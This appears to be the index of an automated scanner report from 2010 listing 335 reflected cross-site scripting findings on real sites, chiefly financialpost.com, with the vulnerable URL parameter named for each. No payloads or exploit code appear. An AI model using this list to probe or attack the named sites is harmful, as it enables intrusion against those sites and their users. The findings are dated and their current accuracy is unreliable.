Cross Site Scripting, SQL Injection, HTTP Header Injection | Report for 12-18-2010

CloudScan Vulnerability Crawler Report for 12-18-2010

Report generated by XSS.CX at Sun Dec 19 07:08:47 CST 2010.



1. Cross-site scripting (reflected)

1.1. http://digg.com/submit [REST URL parameter 1]

1.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

1.3. http://vancouverdisabilitiesday.ca/%20target= [name of an arbitrarily supplied request parameter]

1.4. http://ww3.nationalpost.com/services/email/share/ [callback parameter]

1.5. http://ww3.nationalpost.com/services/pluck/atc/ [returnurl parameter]

1.6. http://www.advisorworld.com/Compare-Annuity-Rates-2 [utm_source parameter]

1.7. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]

1.8. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]

1.9. http://www.canada.com/ [name of an arbitrarily supplied request parameter]

1.10. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]

1.11. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]

1.12. http://www.domaintools.com/products/history-block.html [REST URL parameter 2]

1.13. http://www.domaintools.com/products/reports/reverse-ip.html [REST URL parameter 3]

1.14. http://www.domaintools.com/products/units.html [REST URL parameter 2]

1.15. http://www.domaintools.com/reverse-ip/explorer.html [REST URL parameter 2]

1.16. http://www.financialpost.com/16994.rss [REST URL parameter 1]

1.17. http://www.financialpost.com/17052.rss [REST URL parameter 1]

1.18. http://www.financialpost.com/17082.rss [REST URL parameter 1]

1.19. http://www.financialpost.com/906070.rss [REST URL parameter 1]

1.20. http://www.financialpost.com/917156.rss [REST URL parameter 1]

1.21. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 1]

1.22. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 2]

1.23. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 3]

1.24. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 4]

1.25. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 1]

1.26. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 2]

1.27. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 3]

1.28. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 4]

1.29. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 1]

1.30. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 2]

1.31. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 3]

1.32. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 4]

1.33. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 5]

1.34. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 1]

1.35. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 2]

1.36. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 3]

1.37. http://www.financialpost.com/blogs/ [REST URL parameter 1]

1.38. http://www.financialpost.com/careers/ [REST URL parameter 1]

1.39. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 1]

1.40. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 3]

1.41. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 4]

1.42. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 1]

1.43. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 3]

1.44. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 4]

1.45. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 1]

1.46. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 3]

1.47. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 4]

1.48. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 1]

1.49. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 3]

1.50. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 4]

1.51. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 1]

1.52. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 3]

1.53. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 4]

1.54. http://www.financialpost.com/css/print.css [REST URL parameter 1]

1.55. http://www.financialpost.com/css/print.css [REST URL parameter 2]

1.56. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 1]

1.57. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 2]

1.58. http://www.financialpost.com/entrepreneur/ [REST URL parameter 1]

1.59. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 1]

1.60. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 3]

1.61. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 4]

1.62. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 1]

1.63. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 3]

1.64. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 4]

1.65. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 1]

1.66. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 3]

1.67. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 4]

1.68. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 1]

1.69. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 3]

1.70. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 4]

1.71. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 1]

1.72. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 3]

1.73. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 4]

1.74. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 1]

1.75. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 2]

1.76. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 1]

1.77. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 3]

1.78. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 4]

1.79. http://www.financialpost.com/executive/ [REST URL parameter 1]

1.80. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 1]

1.81. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 3]

1.82. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 4]

1.83. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 1]

1.84. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 3]

1.85. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 4]

1.86. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 1]

1.87. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 3]

1.88. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 4]

1.89. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 1]

1.90. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 3]

1.91. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 4]

1.92. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 1]

1.93. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 3]

1.94. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 4]

1.95. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 1]

1.96. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 2]

1.97. http://www.financialpost.com/executive/ceo/ [REST URL parameter 1]

1.98. http://www.financialpost.com/executive/ceo/ [REST URL parameter 2]

1.99. http://www.financialpost.com/executive/hr/ [REST URL parameter 1]

1.100. http://www.financialpost.com/executive/hr/ [REST URL parameter 2]

1.101. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 1]

1.102. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 2]

1.103. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 1]

1.104. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 3]

1.105. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 4]

1.106. http://www.financialpost.com/executive/women/ [REST URL parameter 1]

1.107. http://www.financialpost.com/executive/women/ [REST URL parameter 2]

1.108. http://www.financialpost.com/images/favicon.ico [REST URL parameter 1]

1.109. http://www.financialpost.com/images/favicon.ico [REST URL parameter 2]

1.110. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 1]

1.111. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 2]

1.112. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 3]

1.113. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 1]

1.114. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 2]

1.115. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 3]

1.116. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 4]

1.117. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 1]

1.118. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 2]

1.119. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 1]

1.120. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 2]

1.121. http://www.financialpost.com/magazine/ [REST URL parameter 1]

1.122. http://www.financialpost.com/markets/ [REST URL parameter 1]

1.123. http://www.financialpost.com/markets/company/index.html [REST URL parameter 1]

1.124. http://www.financialpost.com/markets/company/index.html [REST URL parameter 2]

1.125. http://www.financialpost.com/markets/company/index.html [REST URL parameter 3]

1.126. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 1]

1.127. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 2]

1.128. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 3]

1.129. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 4]

1.130. http://www.financialpost.com/markets/currencies/ [REST URL parameter 1]

1.131. http://www.financialpost.com/markets/currencies/ [REST URL parameter 2]

1.132. http://www.financialpost.com/markets/data/ [REST URL parameter 1]

1.133. http://www.financialpost.com/markets/data/ [REST URL parameter 2]

1.134. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 1]

1.135. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 2]

1.136. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 3]

1.137. http://www.financialpost.com/markets/funds/ [REST URL parameter 1]

1.138. http://www.financialpost.com/markets/funds/ [REST URL parameter 2]

1.139. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 1]

1.140. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 2]

1.141. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 3]

1.142. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 4]

1.143. http://www.financialpost.com/markets/futures/ [REST URL parameter 1]

1.144. http://www.financialpost.com/markets/futures/ [REST URL parameter 2]

1.145. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 1]

1.146. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 2]

1.147. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 1]

1.148. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 2]

1.149. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 1]

1.150. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 2]

1.151. http://www.financialpost.com/markets/news/ [REST URL parameter 1]

1.152. http://www.financialpost.com/markets/news/ [REST URL parameter 2]

1.153. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 1]

1.154. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 2]

1.155. http://www.financialpost.com/markets/results/index.html [REST URL parameter 1]

1.156. http://www.financialpost.com/markets/results/index.html [REST URL parameter 2]

1.157. http://www.financialpost.com/markets/results/index.html [REST URL parameter 3]

1.158. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 1]

1.159. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 2]

1.160. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 1]

1.161. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 2]

1.162. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 3]

1.163. http://www.financialpost.com/most-popular/ [REST URL parameter 1]

1.164. http://www.financialpost.com/news/ [REST URL parameter 1]

1.165. http://www.financialpost.com/news/FP500/ [REST URL parameter 1]

1.166. http://www.financialpost.com/news/FP500/ [REST URL parameter 2]

1.167. http://www.financialpost.com/news/business-insider/ [REST URL parameter 1]

1.168. http://www.financialpost.com/news/business-insider/ [REST URL parameter 2]

1.169. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 1]

1.170. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 2]

1.171. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 4]

1.172. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 5]

1.173. http://www.financialpost.com/news/economy/ [REST URL parameter 1]

1.174. http://www.financialpost.com/news/economy/ [REST URL parameter 2]

1.175. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 1]

1.176. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 2]

1.177. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 4]

1.178. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 5]

1.179. http://www.financialpost.com/news/energy/ [REST URL parameter 1]

1.180. http://www.financialpost.com/news/energy/ [REST URL parameter 2]

1.181. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 1]

1.182. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 2]

1.183. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 4]

1.184. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 5]

1.185. http://www.financialpost.com/news/financials/ [REST URL parameter 1]

1.186. http://www.financialpost.com/news/financials/ [REST URL parameter 2]

1.187. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 1]

1.188. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 2]

1.189. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 4]

1.190. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 5]

1.191. http://www.financialpost.com/news/legal/ [REST URL parameter 1]

1.192. http://www.financialpost.com/news/legal/ [REST URL parameter 2]

1.193. http://www.financialpost.com/news/marketing/ [REST URL parameter 1]

1.194. http://www.financialpost.com/news/marketing/ [REST URL parameter 2]

1.195. http://www.financialpost.com/news/mining/ [REST URL parameter 1]

1.196. http://www.financialpost.com/news/mining/ [REST URL parameter 2]

1.197. http://www.financialpost.com/news/technology/ [REST URL parameter 1]

1.198. http://www.financialpost.com/news/technology/ [REST URL parameter 2]

1.199. http://www.financialpost.com/opinion/ [REST URL parameter 1]

1.200. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 1]

1.201. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 2]

1.202. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 1]

1.203. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 2]

1.204. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 1]

1.205. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 2]

1.206. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 4]

1.207. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 5]

1.208. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 1]

1.209. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 2]

1.210. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 4]

1.211. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 5]

1.212. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 1]

1.213. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 2]

1.214. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 4]

1.215. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 5]

1.216. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 1]

1.217. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 2]

1.218. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 4]

1.219. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 5]

1.220. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 1]

1.221. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 2]

1.222. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 3]

1.223. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 1]

1.224. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 2]

1.225. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 3]

1.226. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 1]

1.227. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 2]

1.228. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 3]

1.229. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 1]

1.230. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 2]

1.231. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 3]

1.232. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 1]

1.233. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 2]

1.234. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 3]

1.235. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 1]

1.236. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 2]

1.237. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 3]

1.238. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 1]

1.239. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 2]

1.240. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 3]

1.241. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 1]

1.242. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 2]

1.243. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 3]

1.244. http://www.financialpost.com/personal-finance/ [REST URL parameter 1]

1.245. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 1]

1.246. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 3]

1.247. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 4]

1.248. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 1]

1.249. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 3]

1.250. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 4]

1.251. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 1]

1.252. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 3]

1.253. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 4]

1.254. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 1]

1.255. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 3]

1.256. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 4]

1.257. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 1]

1.258. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 3]

1.259. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 4]

1.260. http://www.financialpost.com/personal-finance/Where+retire+Florida+most+popular+state/3994547/story.html [REST URL parameter 1]

1.261. http://www.financialpost.com/personal-finance/Where+retire+Florida+most+popular+state/3994547/story.html [REST URL parameter 3]

1.262. http://www.financialpost.com/personal-finance/Where+retire+Florida+most+popular+state/3994547/story.html [REST URL parameter 4]

1.263. http://www.financialpost.com/personal-finance/family/ [REST URL parameter 1]

1.264. http://www.financialpost.com/personal-finance/family/ [REST URL parameter 2]

1.265. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 1]

1.266. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 2]

1.267. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 4]

1.268. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 5]

1.269. http://www.financialpost.com/personal-finance/mortgages/ [REST URL parameter 1]

1.270. http://www.financialpost.com/personal-finance/mortgages/ [REST URL parameter 2]

1.271. http://www.financialpost.com/personal-finance/rrsp/ [REST URL parameter 1]

1.272. http://www.financialpost.com/personal-finance/rrsp/ [REST URL parameter 2]

1.273. http://www.financialpost.com/personal-finance/taxes/ [REST URL parameter 1]

1.274. http://www.financialpost.com/personal-finance/taxes/ [REST URL parameter 2]

1.275. http://www.financialpost.com/personal-finance/tfsa/ [REST URL parameter 1]

1.276. http://www.financialpost.com/personal-finance/tfsa/ [REST URL parameter 2]

1.277. http://www.financialpost.com/personal-finance/wealthy-boomer/ [REST URL parameter 1]

1.278. http://www.financialpost.com/personal-finance/wealthy-boomer/ [REST URL parameter 2]

1.279. http://www.financialpost.com/personal-finance/your-money/ [REST URL parameter 1]

1.280. http://www.financialpost.com/personal-finance/your-money/ [REST URL parameter 2]

1.281. http://www.financialpost.com/podcasts/ [REST URL parameter 1]

1.282. http://www.financialpost.com/related/topics/index.html [REST URL parameter 1]

1.283. http://www.financialpost.com/related/topics/index.html [REST URL parameter 2]

1.284. http://www.financialpost.com/related/topics/index.html [REST URL parameter 3]

1.285. http://www.financialpost.com/related/topics/index.html [subject parameter]

1.286. http://www.financialpost.com/related/topics/index.html [type parameter]

1.287. http://www.financialpost.com/scripts/include.aspx [REST URL parameter 1]

1.288. http://www.financialpost.com/scripts/include.aspx [REST URL parameter 2]

1.289. http://www.financialpost.com/sitemap/ [REST URL parameter 1]

1.290. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 1]

1.291. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 2]

1.292. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 3]

1.293. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 5]

1.294. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 6]

1.295. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 1]

1.296. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 2]

1.297. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 3]

1.298. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 5]

1.299. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 6]

1.300. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 1]

1.301. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 2]

1.302. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 3]

1.303. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 5]

1.304. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 6]

1.305. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 1]

1.306. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 2]

1.307. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 3]

1.308. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 4]

1.309. http://www.financialpost.com/video/index.html [REST URL parameter 1]

1.310. http://www.financialpost.com/video/index.html [REST URL parameter 2]

1.311. http://www.foodnetwork.ca/guides/holidays/ [REST URL parameter 1]

1.312. http://www.foodnetwork.ca/guides/holidays/ [REST URL parameter 2]

1.313. http://www.manta.com/c/mtxl353/pla [name of an arbitrarily supplied request parameter]

1.314. http://www.nationalpost.com/_assets/images/arrow-sort-down.gif [REST URL parameter 1]

1.315. http://www.nationalpost.com/_assets/images/arrow-sort-down.gif [REST URL parameter 2]

1.316. http://www.nationalpost.com/_assets/images/arrow-sort-up.gif [REST URL parameter 1]

1.317. http://www.nationalpost.com/_assets/images/arrow-sort-up.gif [REST URL parameter 2]

1.318. http://www.nationalpost.com/case+million+Canadians/3938655/story.html [REST URL parameter 2]

1.319. http://www.nationalpost.com/css/main.min.css [REST URL parameter 1]

1.320. http://www.nationalpost.com/homes/Helen+Morris+Illegal+renos+such+drag/3994453/story.html [REST URL parameter 1]

1.321. http://www.nationalpost.com/homes/Helen+Morris+Illegal+renos+such+drag/3994453/story.html [REST URL parameter 3]

1.322. http://www.nationalpost.com/js/IDMSquote.min.js [REST URL parameter 1]

1.323. http://www.nationalpost.com/js/NPLib.min.js [REST URL parameter 1]

1.324. http://www.nationalpost.com/js/jquery.lazyload.mini.js [REST URL parameter 1]

1.325. http://www.nationalpost.com/related/topics/story.html [REST URL parameter 1]

1.326. http://www.nationalpost.com/related/topics/story.html [REST URL parameter 2]

1.327. http://www.nationalpost.com/rss/feed.xml [REST URL parameter 1]

1.328. http://www.nationalpost.com/search/index.html [REST URL parameter 1]

1.329. http://www.nationalpost.com/weather/index.html [REST URL parameter 1]

1.330. http://www.newswire.ca/en/releases/archive/January2010/25/c3763.html [name of an arbitrarily supplied request parameter]

1.331. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.332. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.333. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.334. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [REST URL parameter 2]

1.335. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [REST URL parameter 3]

